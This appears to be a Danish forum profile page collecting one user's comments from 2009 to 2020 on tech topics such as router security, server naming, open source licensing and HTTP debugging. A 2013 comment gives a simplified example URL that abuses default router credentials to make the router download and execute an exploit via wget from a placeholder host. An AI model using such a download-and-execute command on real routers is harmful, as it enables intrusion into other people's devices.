Claus Stovgaard

Hardware søges: Gigabit-probe

Hvis du leder efter noget tilsvarende RPi, men med flere kræfter, så kan du overveje nvidia jetson nano. Koster omkring 1100 kr. Nogen tester også 10g med den

https://antmicro.com/blog/2020/07/10gb-ethernet-with-jetson-nano/

I forhold til storage har den en M.2 Key E.

27. november 2020 kl. 16:59
Sådan er det bare...

Er meget enig med Tommy, i at vi skal have klarlagt hvad der er korrekt og godt håndværk.

I forhold til analogien. Hvis du f.eks. ser på lovgivningen i forbindelse med boliger, så må jeg som beboer ikke bare lave ændringer som jeg lyster. F.eks. skal jeg have en elektriker autorisation, hvis jeg ønsker at sætte nye stikkontakter op på en væg. Og på samme måde må jeg ikke bare ændre bærende elementer i væggen som jeg lyster. En pilot der skal flyve har også en autorisation. Jeg kan ikke bare gå ud og lege pilot.

Så på hvilken niveau skal vi ligge autorisationer i forbindelse med IT, for at tilkendegive at man har den fornødne viden?

I forbindelse med en IT-havarikommission, vil jeg tro at der også skal defineres hvad der er godt håndværk, når der et givet styk software skal vurderes.

Hvis man ser mange af flystyrtene er problemet ofte en sammenblanding af flere ting. Det kan f.eks. være i selve flykonstruktionen, svarende til en fejl i forbindelse med design af softwaren. En fejl i forbindelse med vedligehold med indførsel af nye rutiner fra producenten, svarende til manglende opdatering af software. En pilotfejl, svarende til en fejl af systemadministratoren. En driftfejl hvor mekanikere påpeger at et fly ikke er klar til drift, men bliver presset af en driftchef til at sætte flyet i drift. Så jeg synes der er alt mulig grund til en IT-havarikomission. Ikke kun i forbindelse med design af software, men også i forbindelse med drift (hacking), og kompetance af de rigtige folk.

27. august 2013 kl. 12:05
Her er Nokias nye Lumia 1020 med 41 megapixel kamera

Afhængig af hvordan de har skruet sensoren sammen kan der faktisk være gode ideer i det. Jeg tænker bl.a. på Pixel binning på pixel brønd niveau. (Med omtanke kan det forberede SNR en hel del for høj iso billeder). Hjælp til bayer interpolationen. Selvfølgelig digital zoom som de selv nævner. Afhængig af hvordan data kan læses ud af sensoren, kan det også hjælpe til bedre autofokus, og forbedringer til ikke at få rystet billeder.

Det kan selvfølgelig ikke erstatte et kamera med APS-C størrelse sensor, da den selvfølgelig kan opfange flere fotoner, og har bedre linser.

Vil dog tro den godt kan konkurrerer med mange små kompakt kamera.

Så glæder mig til at se nogen praktiske billeder fra den, før jeg vil dømme den.

12. juli 2013 kl. 00:13
Vil virus og ustabilitet til livs: Rumstation skrotter Windows til fordel for Linux

Jeg kan sagtens se argumenter for at hacke en router - mit argument er, at det giver et langt mere potent våben at hacke en desktop-PC end en router.

Det er jeg helt enig i. Så snart man ikke skal bruge den som en proxy, eller som en del af et botnet til DDNS, så er en router rimelig værdiløs. Så snart der skal laves noget som helst andet end at flytte netværkspakker, så forsvinder ideen med den.

Det tror jeg da, at du har ret i - men det tager lissom luften ud af argumentet om, at det er Linux's skyld, at så får routere efter sigende er hacket.

Jeps - og dette gør sig i endnu større skala gældende for at finde et exploit i Windows.

Sikkerheden er aldrig stærkere end det svageste led. Og selvom man har en rimelig stærk linux kerne, giver det ingen sikkerhed hvis man har et piv åben webinterface kørende ovenpå. Så Linux i sig selv giver ingen sikkerhed. Linux giver dog muligheden for at lave en meget sikker SOHO router hvis man lyster. Jeg har generelt benyttet OpenWRT når jeg har muligheden for det - https://openwrt.org/ Jeg har så konfigureret dem uden web interface, og begrænset adgangen til SSH med nøgler (Ingen password basseret login). Det betyder at den firmware er rimelig unik, og med en meget lille angrebsvinkel.

Så sat lidt på spidsen, håber jeg at ved en SOHO router med Linux, kan man enten håbe på producenten har taget nok fra open source miljøet til en sikker platform, eller man kan lave sin egen firmware hvis ikke man er tilfreds med mulighederne og sikkerheden i den firmware fra producenten. Det skal tages med et gran salt, da det vil være langt de færeste som lige kan lave en custom linux til en router.

Med hensyn til hvor mange routere der er angrebet. Så ved man det netop ikke. Og tro mig, de fleste tele udbydere vil holde kortene meget tæt til kroppen hvis deres valgte SOHO router har et problem. Så giver dig helt ret i, at det er meget svært at bestemme hvor mange routere som bliver udnyttet til andet formål.

Nu er min primære beskæftigelse ikke at arbejde med routere, men jeg har endnu til gode at se en SOHO-router, der tillader adgang fra andet en enten et kablet netværk eller via WIFI fra det lokale net. Har jeg bare været heldig, eller er det normen, at man nu eksponerer sin router til internettet, når den er startet første gang?

Min henvisning til standard kodeordet var heller ikke til direkte adgang. Ideen er et pull/push angreb. Hvis du sidder inde bag ved, og lave et pull i form af noget noget kode der beder din brower om at lave et push til din router. Kunne f.eks. være et kald til "http://192.168.1.1/exec.cgi?user=admin&pass=admin&cmd='wget -P /tmp/ http://path/to/exploit/ && tar xvpf /tmp/exploit.tar && /tmp/exploit'" Og selvfølgelig ignore det hvis den fejler. Dette er selvfølgelig forsimplet, men pointen er der.

13. maj 2013 kl. 22:45
Vil virus og ustabilitet til livs: Rumstation skrotter Windows til fordel for Linux

Som embedded specialist, interessere jeg mig nok mere for routere en normen, men jeg kan hurtig komme med hvorfor de er interessante fra en crackers pespektiv.

Som andre har skrevet, skal der ikke meget CPU/RAM til at udnytte en privat linie maksimalt i forbindelse med et DDOS.

Tilgængelighed. Dette består bl.a. af

  • SOHO routere skal være billige. Derfor spares der på ingeniør timer i design af produktet. Typisk speciel på sikkerheden. Jeg har set webinterfaces som udnytter HTTP GET direkte til shell exekvering.
  • Typisk så har en udbyder som T-mobile / AT&T flere millioner af den samme type / samme firmware. E.g. få hacket den første, og sæt en fælde for resten. Svært for brugeren at opdage. Man skal virkelig vide hvad man leder efter, for at finde en hydra på sin router. Mange har brugt default brugernavn / kodeord. (Er ved at blive bedre, men det eksistere stadig).

I 2008 havde Sebastian Maier en god talk om emnet. http://freedom.opensourcedays.org/2008/agenda/sessions/SebastianMaier.shtml

13. maj 2013 kl. 19:20
Jeg døber dig, Harddisk1 i Stuepc2. Yeah, right.

Jeg har kørt med flere forskellige navngivninger, afhængig af stedet.

I kollegienet hvor jeg har været server administrator i mange år, kørte vi generelt efter kvindenavne. Typisk model / skuespiller, men kunne også være navnet på figuren i en film eller sportsstjerne. F.eks. har vi haft servere med navene Lara, Leeoo (5 elements - den perfekte skabning), og et sæt der hedder Acid og Burn (Angelina Jolie’s nick i Hackers). Derudover er det navne som Lucy, Elisha, Tara, Gemma, Maria, Lima osv.

Hos biostatstik på SDU, kørte vi med matematikere som Hilbert, Rao, Cramer, Adrain, Donsker etc.

Med mine egene Linux servere, så er Penguins of Madagascar temaet. Host serveren hedder Skipper efter føre pingvinen, Rico er min webserver / versionsstyring, da det er pingvinen som altid hoster op med det man mangler, Kowalski er min log/statistik server da det er pingvinen der altid beregner ting. Den sidste pingvin, Private, er brugt som navnet til en server for private ting som backup, remote desktop etc. Jeg har også min Linux maskine på arbejde som hedder Mort. Selvfølge hedder min egen Windows 7 maskine Burt, efter den fede elefant i Penguins of Madagascar.

Generelt synes jeg det er en dårlig ide med for lange navne til maskiner. De er typisk svære at stave til, og tager længere tid at taste ind, når man skal nå maskinen. De bedste navne er omkring 4 til 5 tegn, og er sigende for hvad maskinen skal lave.

20. februar 2013 kl. 08:06
Hånden på hjertet: Vil du betale for Open Source?

Hvis det f.eks. er i forbindelse med en server, som jeg bruger i arbejdssammenhæng og tjener penge på, vil jeg ikke have noget i mod at lave et ”open source abonnement” til dem som vedligeholder det man bruger. Det kunne f.eks. være til *BSD eller den Linux distribution man bruger, og det software som arbejder for en, f.eks. en webserver. Jeg ser det som en udgift for at nogen kan vedligeholde den software jeg tjener penge på.

Når de drejer sig om spil og andre programmer som jeg bruger privat på desktoppen, så er jeg nok mere tilbageholdene i forhold til et abonnement. Hvis det er et program som jeg bruger hver dag, så kunne det klart være en mulighed, men ikke som udgangspunkt. Jeg vil nærmere give min arbejdskraft som ingeniør til projektet, så laver korrekte bug reports, der er let reproducer bare. Evt. med link til i koden hvor jeg ser problemet. Jeg har utrolig gode erfaringer med at hvis man laver en super god bug report, hvor man præcist angiver hvordan problemet kan reproduceres og hvor man ser problemet i koden, så er der ofte en løsning inden for 48 timer. Hvis det var et program som jeg brugte på desktoppen på arbejde, vil jeg vurdere det i det enkelte tilfælde. Der kunne det f.eks. være en aftale om en bestemt feature til et bestemt beløb.

Så synes det afhænger af flere ting.

10. juli 2012 kl. 09:19
Sysadm: Sentimentale Stoddere...

Jeg er generelt imod lange oppetider på alt det der kører i produktion, med services til nettet. Lang oppetid betyder ofte sløv sysadmin, da det er vigtig at have sikkerhedsopdateringer (også til kernen), og være sikker på at kunne komme hurtigt op efter en genstart af serveren (Strømnedbrud, PSU fejl, andet).

Men kan sagtens se det sentimentale i at man lader en specifik maskine stå, hvis man vurdere at den ikke kan være til fare.

F.eks. har mit kollegie en gentoo maskine som tidligere har kørt server, som på nuværende tidspunkt ikke køre andet end ssh og irssi. Den befinder sig meget lukket, og får alle opdateringer på nær kernen løbende. Det betyder så også at udev er skiftet, og init er skiftet over til openrc, så vil den sikkert ikke kunne starte på den kerne igen.

  1. frosteyes@tara ~ $ uname -a
  2. Linux tara 2.6.19-gentoo-r5-HCO #7 Thu Feb 22 08:04:55 CET 2007 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
  3. frosteyes@tara ~ $ uptime
  4. 22:14:43 up 1730 days, 4:20, 2 users, load average: 1.35, 0.70, 0.27

26. januar 2012 kl. 22:20
Nordjysk landsby giver Google gigabit-baghjul

Jeg vil mene det er godt på vej flere steder.

F.eks. har Foreningen Kollegienet Odense ( FKO - http://www.kollegienet.dk ), opgraderet deres interne struktur i sommers med bl.a. en 10G backbone. Og har for ca. en måned siden opgraderet opkoblingen til fsknet til 10G. Stille og rolig får de forskellige kollegier opgraderet deres forbindelse til 1G, hvor det så bliver fordelt mellem beboerne.

F.eks. har H.C. Ørstedskollegiet en 1G forbindelse som bliver delt ud til beboerne, og der er nogen gigebit porte rundt om på kollegiet hvor der er set hastigheder over 800 mbit. De fleste sidder på en 100/100 mbit port, så det er den som sætter hastigheden.

Prisen. Lige over 50 kr. om måneden, da meget bliver lavet som frivillig arbejde i foreningen. Det skal lige siges jeg er selv frivillig i foreningen.

28. november 2011 kl. 09:38
Amatørenes vanddag...

Hvis udgangspunktet er at computeren ”frys” så var der ikke en virkende watchdog.

Inden for embedded verdenen er watchdog timeren typisk en separat hardware del af microchippen, som kan genstarte hele systemet. Så hvis systemet ikke sørger for at resette watchdog'en løbende vil den genstarte hele systemet.

Det rigtige er som PHK skriver at hvis den nogen sinde bliver trukket, så skal det analysers, så det forhindres i fremtiden.

En sjov anekdote fra et Jack Gansle fordrag en gang, var om et firma som producerede enheder, med fjernbetjeninger. Deres watchdog i fjernbetjeningen blev triggered alt for ofte, men de gjorde ikke noget ved det, da kunden bare trykkede på kontakten igen hvis ikke enheden reagerede. Meget lemfældig omgang med watchdog må man sige.

5. november 2011 kl. 11:50
Start ved begyndelsen...

Virker som et super spændende projekt.

Nu er jeg embedded mand, så jeg vil se på noget FPGA acceleration hvis interfacet ellers giver mulighed for det.

F.eks. så har Dini group jo accelerationskort som http://www.dinigroup.com/new/DNBFC_S12_PCIe.php

Hørte Mike derfra beskrive et 4U cluster med 12 af sådan nogen kort. Performance, hvis ellers algoritmerne kan beskrives i hardware og data transporteres rundt, er noget af det højst mulige.

26. oktober 2011 kl. 16:22
93 dage tilbage...

Hey Mikkel. Den er desværre ikke så nem, da de 256 - 999 du tænker på ikke eksistere. Tænk binært her. En ipv4 adresse består af 4 oktets af 8 bit. Det betyder at hver oktet kan bestå af op til 2 opløftet i 8 svarende til 255 mulige kombinationer.

Samtidig er der nogen adresser som private adresser, multicast osv. som ikke kan benyttes.

Så ipv6 er fremtiden. Arbejder faktisk for hvordan det skal fordeles i subnets osv. Der mangler stadig en rigtig god best practice for dette.

30. november 2010 kl. 22:40
Min Atom-drevne Linux-server sov sig til en alt for høj load

Der findes Atom modeller hvor strømforbruger er mere i centrum. F.eks. Fit-PC

http://www.energystar.gov/index.cfm?fuseaction=find_a_product.showProductDetail&pd_id=1172286&pgw_code=CO&brand_code=28045&pd_code=DES&resultsPerPage=10&sortParameter=brand_name&startnum=1&letter=ALL

Når den benytter maksimalt energi, så er den målt til under 8 watt. Og den burde kunne levere fuld hd video med under 7 watt.

Så det afhænger af pakken.

21. november 2010 kl. 14:35
Hvilken tatovering gør mest ondt: En Android-robot eller et Apple-logo?

Det vil ikke lige være mig, men der er jo mange som har tatoo's og de bliver jo inspireret af teknologien.

http://webupon.com/web-talk/modern-tattoo-designs-reflect-computer-and-web-consumer-choices/

Jeg holder især af "" i nakken ;)

20. november 2010 kl. 15:23
Simpelt er bedre - Kkloud

Jeg er nok lidt modsat i forhold til mange her.

Jeg vil sige at det ikke er hvor meget i logger som er afgørende, men hvordan der er adgang til loggen, hvem der har adgang til den og hvad den bliver brugt til!

I forbindelse med opklaring af sager, der er underlagt offentlig påtale, her taler jeg ikke om overtrædelse af en eller anden copyright, men meget mere alvorligere sager, vil alt den dokumentation der kan skaffes være en god ting. Gerne komplete session oplysninger for folk der har tilgået den problematiske data.

God fornøjelse med projektet.

29. juni 2010 kl. 11:17
Så er den gal igen: Blank skærm i de nationale test

Den må du sgu lige uddybe hvad du helt præcis mener med det Mr. John Vedsegaard.

Jeg troede ellers at det for længst var kendt at man skulle kode "Security by design" og ikke "Security through obscurity". Specielt set i lyset af prisen på dette system, så synes det burde være åben. Hvis dem som har lavet kontrakten med Cowi, eller er gode nok vil de have lavet det som en række lego klodser (de også vil kunne udvikle agilt), med en pænt defineret snitflade som så kunne sættes sammen til dette system. De udviklede lego klodser ville så også kunne bruges i andre offentlige projekter, og på den måde give billigere offentlige projekter i fremtiden.

Der kom jeg vidst lidt på afveje. I bund og grund ville jeg bare skrive at dem der stadig tror på at lukkethed giver "sikkerhed", har vist ikke taget ved lære af huller i software som acrobat reader, IE og andet "lukket" software.

21. marts 2010 kl. 11:54
10 ting at have tjek på inden du vælger open source

Der er ikke kun Open Source specifik. Alle de nævnte krav er jo noget der skal tages stilling til, ligegyldig om man benytter Open Source, eller køber et produkt.

Valg af licens betingelser skal altid passe til projektet. F.eks. så kan et embedded system være et mareridt med licenser. Valg af OS f.eks. DSP/BIOS, QNX, eCos, Linux og valg af tilhørende moduler kan alle være underlagt forskellige licenser. Også med hensyn til royalties osv. hvilket jo kan gøre det til et juridisk mareridt.

GPL har fordele og ulemper. Den er stor og kompleks sammenlignet med BSD og MIT licensen. Der er en gråzone med dynamisk linkning af programmer. FSF mener jo at hvis de deler datastrukture er det underlagt GPL kravet. Fordelen med GPL er at den har "tvunget" nogen til at frigive kode der ellers ikke vil være frigivet. Bemærk ", da jeg selvfølgelig ikke kan spå.

Personligt bryder jeg mig ikke om GPL til embedded enheder da den netop kræver at hvis jeg ønsker at vider distribuere enheden, og det er statisk linket sammen, skal det hele være underlagt GPL. De begrænser optræder jo ikke når man benytter f.eks. BSD licenseret kode.

Selv benytter jeg generelt BSD licensen for mine projekter, da det giver gode muligheder for at de kan bruges i alle projekter. Også til ting som ikke nødvendigvis er Open Source.

30. december 2009 kl. 16:10
Firefox 3.5 er verdens største browser

Hej Benny

Selvom jeg ikke kender systemet, vil jeg gerne komme med et bud på hvad problemet er. Hvis du benytter wget eller tilsvarende vil du se følgende omkring headeren:

Omegn6.html wget -S http://homepage.mac.com/brumleby/Omegn6.html

--2009-12-22 10:56:50-- http://homepage.mac.com/brumleby/Omegn6.html

Resolving homepage.mac.com... 17.250.248.34

Connecting to homepage.mac.com|17.250.248.34|:80... connected.

HTTP request sent, awaiting response...

HTTP/1.0 200 OK

Date: Tue, 22 Dec 2009 09:56:51 GMT

Content-Length: 15505

Content-Type: text/html

Cache-Control: max-age=60, must-revalidate

Connection: keep-alive

Proxy-Connection: keep-alive

Server: AppleIDiskServer-1F3014

x-responding-server: hpng003

Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/brumleby

Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/brumleby

X-dmUser: brumleby

ETag: "u-1g3s18hn-902p-ikpyjuo1a-25bs85ze5r0"

Last-Modified: Sun, 18 Oct 2009 03:27:18 GMT

Via: 1.1 hpcache006 (NetCache NetApp/6.0.5P2D2)

Omegn6_2.html wget -S http://homepage.mac.com/brumleby/Omegn6_2.html

--2009-12-22 10:57:42-- http://homepage.mac.com/brumleby/Omegn6_2.html

Resolving homepage.mac.com... 17.250.248.34

Connecting to homepage.mac.com|17.250.248.34|:80... connected.

HTTP request sent, awaiting response...

HTTP/1.0 200 OK

Date: Tue, 22 Dec 2009 09:57:42 GMT

Content-Length: 15505

Content-Type: application/octet-stream

Cache-Control: max-age=60, must-revalidate

Connection: keep-alive

Proxy-Connection: keep-alive

Server: AppleIDiskServer-1F3014

x-responding-server: hpng014

Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/brumleby

Set-Cookie: mmr=nk11r10; Domain=homepage.mac.com; Path=/brumleby

X-dmUser: brumleby

ETag: "c-1g3s18hn-2clp-p8myk1jqd-1pt1ceze870"

Last-Modified: Tue, 22 Dec 2009 09:53:59 GMT

Via: 1.1 hpcache008 (NetCache NetApp/6.0.5P2D2)

Hvis du ser på Content-Type, så sender din webserver 2 forskellige ting ud.

Forskellen kan skyldes at der gemmes noget metadata omkring filerne når du uploader dem til systemet. Den metadata vil fortælle hvordan webserveren skal servere filen til brugerne.

Hvordan du så ændre det, skal jeg ikke lige kunne sige, da jeg aldrig har rodet med MAC. Held og lykke med opgaven i hvert fald, da du nu har en ide om hvad årsagen er.

22. december 2009 kl. 11:07
Firefox 3.5 er verdens største browser

Se http://tools.ietf.org/html/rfc2046#section-4.5.1

The recommended action for an implementation that receives an "application/octet-stream" entity is to simply offer to put the data in a file, with any Content-Transfer-Encoding undone, or perhaps to use it as input to a user-specified process.

To reduce the danger of transmitting rogue programs, it is strongly recommended that implementations NOT implement a path-search mechanism whereby an arbitrary program named in the Content-Type parameter (e.g., an "interpreter=" parameter) is found and executed using the message body as input.

Så når Chrome, Firefox og andre browser der følger anbefalingen modtager det du sender ud, så skal de spørge om man ønsker at gemme filen.

Hvis andet ønskes, så vil jeg i højste grad anbefale at fikse webserveren, så den følger RFC.

21. december 2009 kl. 21:43